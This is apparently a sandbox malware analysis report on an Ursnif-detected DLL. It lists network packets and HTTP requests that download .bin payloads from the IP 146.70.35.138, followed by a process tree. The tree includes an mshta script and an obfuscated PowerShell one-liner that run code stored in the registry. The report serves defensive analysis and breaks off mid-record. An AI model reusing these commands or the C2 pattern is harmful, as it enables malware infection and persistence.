                                          Apr 23, 2022 08:12:21.513892889 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.513926983 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.513951063 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.513952971 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.513984919 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.514014006 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.514019012 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.514053106 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.514054060 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.514079094 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.514095068 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.514102936 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.514113903 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.514137983 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.514153957 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.514179945 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.514192104 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.514233112 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.514255047 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.514259100 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.514281988 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.514286041 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.514329910 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.552782059 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.552823067 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.552843094 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.552849054 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.552858114 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.552877903 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.552886009 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.552918911 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.552926064 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.552941084 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.552954912 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.552967072 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.552983999 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.553036928 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.553097963 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.553647041 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.553673983 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.553689957 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.553694963 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.553709984 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.553714991 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.553735018 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.553957939 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.553978920 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.553999901 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.554004908 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.554022074 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.554042101 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.554054976 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.554068089 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.554116964 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.554117918 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.554158926 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.554184914 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.554200888 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.554238081 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.554255009 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.554295063 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.554346085 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.554364920 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.554385900 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.554402113 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.554406881 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.554423094 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.554447889 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.554476023 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.554514885 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.592963934 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.593023062 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.593064070 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.593091011 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.593116999 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.593154907 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.593172073 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.593216896 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.593266964 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.593314886 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.593337059 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.593352079 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.593352079 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.593370914 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.593399048 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.593415976 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.593465090 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.593961954 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.593986034 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.594007969 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.594023943 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.594033957 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.594048023 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.594067097 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.594072104 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.594125032 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.594482899 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.594508886 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.594531059 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.594535112 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.594549894 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.594602108 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.594623089 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.594640970 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.594665051 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.594688892 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.594690084 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.594706059 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.594718933 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.594743967 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.594753981 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.594767094 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.594789028 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.594789028 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.594806910 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.594830990 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.594865084 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.594908953 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.632968903 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.633060932 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.633126974 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.633155107 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.633182049 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.633249044 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.633275032 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.633337021 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.633413076 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.633529902 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.633569956 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.633608103 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.633611917 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.633641005 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.633642912 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.633676052 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.633807898 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.633879900 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.634663105 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.634686947 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.634720087 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.634740114 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.634771109 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.634840965 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.634877920 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.634882927 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.634923935 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.634951115 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.634975910 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.635148048 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.823791981 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.847484112 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:22.199361086 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:22.199390888 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:22.199438095 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:22.199506998 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:13:14.888428926 CEST4976680192.168.2.4146.70.35.138
                                          • 146.70.35.138
                                           Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
                                           0          | 192.168.2.4 | 49766       | 146.70.35.138  | 80               | C:\Windows\SysWOW64\rundll32.exe
                                           Timestamp | kBytes transferred | Direction | Data
                                           Apr 23, 2022 08:12:19.910176992 CEST | 1224 | OUT | GET /phpadmin/DRUYboFifxi6C3/_2BjVEcKiT1b8A_2BvMed/1ckh5D3V8MdKp2S2/SxMBQuJjSXDeW9Y/7fodbbXY21Jrsa2aXJ/S90Gqb_2B/KDYz_2F5NJsyx14KqPKz/ecUQVATr13lzZyN_2B_/2BoLTTXT06dmMNQURoEaga/M1AdtgAQJw1vj/q_2FSYWg/oo4zTjJDuzf2mz8BRfV3I9z/TX7m3RhRWd/LYr8gkK9WgmQ0jja9/kmBHLi0WTs_2/FFd4Km9NmRn/_2FUZ.src HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                          Host: 146.70.35.138
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                           Apr 23, 2022 08:12:20.288152933 CEST | 1238 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.18.0 (Ubuntu)
                                          Date: Sat, 23 Apr 2022 06:12:20 GMT
                                          Content-Type: application/octet-stream
                                          Content-Length: 185492
                                          Connection: keep-alive
                                          Pragma: public
                                          Accept-Ranges: bytes
                                          Expires: 0
                                          Cache-Control: must-revalidate, post-check=0, pre-check=0
                                          Content-Disposition: inline; filename="626398c43e1ae.bin"
                                           Apr 23, 2022 08:12:20.776896954 CEST | 1437 | OUT | GET /phpadmin/GVoID0TbPRvLYlr7up2X9/gD2XQvRshzT0oIvQ/0mEtVI_2FJuzvKC/fbaZh1y3_2FnOqy8_2/B0Y8u0dqv/V11JJbfZHGLCQ043KVhZ/2j3FiaSLUSAIqnVTtEF/p_2F7mTRIgp_2F43j86HIJ/7JamWIlhMtaxW/Qv_2BsMI/GK_2BjMae66_2B0eWRxZare/pyglkGar6g/LD_2FkUNwRZVbFFyN/qmaS1_2FZd3W/iyocOp4EpCY/lkbOHJ4rs/yFlR4ppeN_2/FAS.src HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                          Host: 146.70.35.138
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Apr 23, 2022 08:12:21.151750088 CEST1460INHTTP/1.1 200 OK
                                          Server: nginx/1.18.0 (Ubuntu)
                                          Date: Sat, 23 Apr 2022 06:12:21 GMT
                                          Content-Type: application/octet-stream
                                          Content-Length: 237210
                                          Connection: keep-alive
                                          Pragma: public
                                          Accept-Ranges: bytes
                                          Expires: 0
                                          Cache-Control: must-revalidate, post-check=0, pre-check=0
                                          Content-Disposition: inline; filename="626398c51d112.bin"
                                          Apr 23, 2022 08:12:21.823791981 CEST1716OUTGET /phpadmin/Vo3V1ij8xfQAzbYEppxuGj/YfKBcB_2BiFsK/C5o_2FK1/LFX_2FAQmA1J0Gg2IGK0zii/Cqu4J51vDj/wlNBNCb18BPgk55aw/3DJofkjbHHw_/2F3O9t6XtUN/FhzyouLiXCH4qy/e6m_2F6Bp87emTDJkwB0B/GJSc0pfzfjLvMKIS/Fcz1B6FomHVea2H/3F6nRjbT0qghS0NNIb/kfO6CmRa0/E8U4GDXz2DXZU_2BDOzp/T84va5G8JnhB3/UMJfQ.src HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                          Host: 146.70.35.138
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Apr 23, 2022 08:12:22.199361086 CEST1717INHTTP/1.1 200 OK
                                          Server: nginx/1.18.0 (Ubuntu)
                                          Date: Sat, 23 Apr 2022 06:12:22 GMT
                                          Content-Type: application/octet-stream
                                          Content-Length: 1869
                                          Connection: keep-alive
                                          Pragma: public
                                          Accept-Ranges: bytes
                                          Expires: 0
                                          Cache-Control: must-revalidate, post-check=0, pre-check=0
                                          Content-Disposition: inline; filename="626398c6264cb.bin"



                                          Target ID:0
                                          Start time:08:11:50
                                          Start date:23/04/2022
                                          Path:C:\Windows\System32\loaddll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:loaddll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll"
                                          Imagebase:0x990000
                                          File size:116736 bytes
                                          MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Target ID:1
                                          Start time:08:11:51
                                          Start date:23/04/2022
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1
                                          Imagebase:0x1190000
                                          File size:232960 bytes
                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Target ID:2
                                          Start time:08:11:51
                                          Start date:23/04/2022
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1
                                          Imagebase:0x270000
                                          File size:61952 bytes
                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.260779553.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.308220825.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.260884971.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.307999471.0000000004EF9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.309153947.0000000004D7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.306041676.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.418290264.0000000004899000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.307957841.0000000004E7A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.261032532.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.261191379.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.260987111.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.261105592.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.261071181.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.365233310.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.261177888.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.420929959.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:high

                                          Target ID:4
                                          Start time:08:11:53
                                          Start date:23/04/2022
                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 608
                                          Imagebase:0x10e0000
                                          File size:434592 bytes
                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Target ID:10
                                          Start time:08:12:02
                                          Start date:23/04/2022
                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 616
                                          Imagebase:0x1220000
                                          File size:434592 bytes
                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Target ID:14
                                          Start time:08:12:12
                                          Start date:23/04/2022
                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 608
                                          Imagebase:0x1220000
                                          File size:434592 bytes
                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Target ID:23
                                          Start time:08:12:28
                                          Start date:23/04/2022
                                          Path:C:\Windows\System32\mshta.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xf38='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xf38).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                                          Imagebase:0x7ff701c00000
                                          File size:14848 bytes
                                          MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Target ID:24
                                          Start time:08:12:31
                                          Start date:23/04/2022
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                                          Imagebase:0x7ff6ba650000
                                          File size:447488 bytes
                                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Yara matches:
                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.369967418.000001909FD9C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:high

                                          Target ID:25
                                          Start time:08:12:31
                                          Start date:23/04/2022
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff647620000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Target ID:26
                                          Start time:08:12:38
                                          Start date:23/04/2022
                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.cmdline
                                          Imagebase:0x7ff7979b0000
                                          File size:2739304 bytes
                                          MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Reputation:moderate

                                          Target ID:27
                                          Start time:08:12:40
                                          Start date:23/04/2022
                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2392.tmp" "c:\Users\user\AppData\Local\Temp\poet0yxq\CSCB57F583549494C91A9647985948976.TMP"
                                          Imagebase:0x7ff7871c0000
                                          File size:47280 bytes
                                          MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate

                                          Target ID:28
                                          Start time:08:12:43
                                          Start date:23/04/2022
                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.cmdline
                                          Imagebase:0x7ff7979b0000
                                          File size:2739304 bytes
                                          MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET

                                          Target ID:29
                                          Start time:08:12:46
                                          Start date:23/04/2022
                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3B60.tmp" "c:\Users\user\AppData\Local\Temp\bscdh0f0\CSCCEA1AC591E3E41DFA7DCA22F6F20A95.TMP"
                                          Imagebase:0x7ff7871c0000
                                          File size:47280 bytes
                                          MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language

                                          Target ID:30
                                          Start time:08:12:49
                                          Start date:23/04/2022
                                          Path:C:\Windows\System32\control.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\control.exe -h
                                          Imagebase:0x7ff61b590000
                                          File size:117760 bytes
                                          MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language

                                          Target ID:32
                                          Start time:08:12:52
                                          Start date:23/04/2022
                                          Path:C:\Windows\System32\rundll32.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
                                          Imagebase:0x7ff7567e0000
                                          File size:69632 bytes
                                          MD5 hash:73C519F050C20580F8A62C849D49215A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language

                                          Target ID:33
                                          Start time:08:12:54
                                          Start date:23/04/2022
                                          Path:C:\Windows\explorer.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\Explorer.EXE
                                          Imagebase:0x7ff6f3b00000
                                          File size:3933184 bytes
                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language

                                          Target ID:37
